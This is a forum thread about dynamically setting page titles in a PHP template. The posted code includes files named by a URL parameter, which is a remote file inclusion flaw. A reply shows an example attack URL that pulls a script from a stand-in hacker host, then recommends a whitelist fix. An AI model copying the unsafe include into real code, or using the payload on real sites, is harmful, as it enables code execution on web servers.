| SitePoint Sponsor |
I need to know how to change the title dynamically? Below is my template which I used for most of the websites I make.
PHP Code:<html>
<head>
<body>
Header / graphics here
<?php
if (!isset($page))
{
include ("home.php");
}else{
include ("$page.php");
}
Footer
?>
</body>
</head>
</html>
So basically the point of the above is to make links like this:
www.domains.com/?page=home
The only thing is the title wont change and I need to know how to dynamically change the title with different pages.
You could use the array fuction to insert the page title depending on the value of $page:
PHP Code:<?php
$pagetitle_array = array(
'home' => 'page title for home',
'about' => 'page title for about us',
'contact' => 'page title for contact us'
);
// Check $page exists
$pagetitle = (empty($page)) ? 'Default title' : $pagetitle_array[$page];
?>
<html>
<head>
<title><?=$pagetitle?></title>
</head>
<body>
Header / graphics here
<?php
if (!isset($page))
{
include ("home.php");
}else{
include ("$page.php");
}
Footer
?>
</body>
</head>
</html>
include ("$page.php");
have you ever thought about what might happen if someone decides do this?
they just gained the ability to execute whatever php code they want to, using your webserver.Code:http://yourwebsite.com/script.php?page=http://hackersite.com/malacious_script
How do I secure this?Originally Posted by clamcrusher
create a whitelist.
a list of acceptable values. its very secure because its not possible to accept something you didnt specifically list.
you could also use an array, which would be easier to use if you have many pages.PHP Code:// using a switch
switch ($_GET['page']) {
case 'home':
$file = 'home.php';
break;
case 'contact':
$file = 'path/to/contact.php';
break;
case 'about':
$file = 'about.html';
break;
default:
$file = 'default.php';
}
include $file;
}
create a whitelist.
a list of acceptable values. its very secure because its not possible to accept something you didnt specifically list.
you could also use an array, which would be easier to use if you have many pages.PHP Code:// using a switch
switch ($_GET['page']) {
case 'home':
$file = 'home.php';
break;
case 'contact':
$file = 'path/to/contact.php';
// you could also put title in here
$title = 'contact us';
break;
case 'about':
$file = 'about.html';
break;
default:
$file = 'default.php';
}
include $file;
I think another good way is to make sure that there isn't any http/ftp inside the included path. And make sure that the included file is PHP to prevent weird stuff from being read.
In fact, since you have "home.php" and "$page.php" on different files, why not just link to them directly? You can include() your header and footer files from there instead.
Posting Permissions
Bookmarks